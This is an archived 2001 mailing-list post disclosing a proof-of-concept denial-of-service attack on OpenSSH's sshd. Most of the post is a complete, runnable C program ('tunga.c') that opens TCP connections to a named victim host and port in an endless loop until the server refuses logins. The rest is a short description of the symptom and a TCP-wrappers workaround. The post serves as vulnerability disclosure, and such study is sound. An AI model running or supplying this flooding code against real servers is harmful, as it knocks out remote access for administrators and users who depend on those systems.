Vulnerability Development mailing list archives
Possible OpenSSH DoS Attack
From: "Pedro Inacio" <drbrain () phibernet org>
Date: Mon, 10 Dec 2001 23:19:18 -0000
--[ OpenSSH DoS Attack proof of concept ]-- by DrBrain <drbrain () phibernet org> / http://www.phibernet.org --[ Intro ]-- After some tests with sshd, I have noticed that it is possible to generate a DoS attack that gives you the following message when you try to contact the service: ---------- $ ssh user () somehost com ssh_exchange_identification: Connection closed by remote host ---------- This just happens while running the code bellow, because when you stop running it everything works fine. It seems to be a known problem ( http://www.snailbook.com/faq/libwrap-oops.auto.html ), but until now there is no patch available and this problem is present in all OpenSSH versions. Although, there is an advisory to compile the SSH server with libwrap (TCP-wrappers) support and then add some rules in /etc/hosts.{allow,deny} in order to allow connections to sshd from any source address. Anyway, I have made some tests and ALL the machines where vulnerable. In my opinion it is urgent to fix this as soon as possible. --[ Code ]-- #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <stdio.h> #include <unistd.h> int main (int argc, char *argv[]) { int sd, rc; struct sockaddr_in localAddr, servAddr; struct linger ling; struct hostent *h; if(argc < 3) { printf("tunga.c - OpenSSH DoS Attack\n"); printf("by DrBrain <drbrain () phibernet org>\n"); printf("Phibernet Information Network < http://www.phibernet.org
\n\n");
printf("Usage: %s <victim> <port>\n\n",argv[0]); exit(1); } h = gethostbyname(argv[1]); if(h==NULL) { printf("%s: Unknown Host '%s'\n",argv[0],argv[1]); exit(1); } for(;;) { servAddr.sin_family = h->h_addrtype; memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); servAddr.sin_port = htons(atoi(argv[2])); sd = socket(AF_INET, SOCK_STREAM, 0); if(sd<0) { perror("Cannot Open Socket "); exit(1); } rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); if(rc<0) { perror("Cannot Connect "); exit(1); } } exit(0); } That's it! I would like to thank megas and FatZU and all the guys in Phibernet for helping me with some machines while testing the DoS. -- DrBrain "If you don't have a hammer, hack it" ;)
Current thread:
- Possible OpenSSH DoS Attack Pedro Inacio (Dec 10)
- Re: Possible OpenSSH DoS Attack Josha Bronson (Dec 10)
- Re: Possible OpenSSH DoS Attack Robert van der Meulen (Dec 11)
- Re: Possible OpenSSH DoS Attack Jose Nazario (Dec 11)
- Re: Possible OpenSSH DoS Attack Markus Friedl (Dec 11)